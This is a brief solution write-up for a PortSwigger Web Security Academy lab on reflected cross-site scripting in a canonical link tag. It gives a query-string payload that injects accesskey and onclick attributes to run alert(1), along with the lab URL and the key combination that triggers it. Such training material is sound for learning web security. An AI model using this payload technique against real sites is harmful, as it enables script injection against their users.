Port Swigger Reflected XSS in canonical link tag

Reflected XSS in canonical link tag

Solution

Open the website: https://0af1000504a084a18180119000fb00a6.web-security-academy.net/

https://0af1000504a084a18180119000fb00a6.web-security-academy.net/

Input payload

Payload: ?'accesskey='x'onclick='alert(1)
---
https://0af1000504a084a18180119000fb00a6.web-security-academy.net?'accesskey='x'onclick='alert(1)

Press keys: Alt+Shirt+X

Solved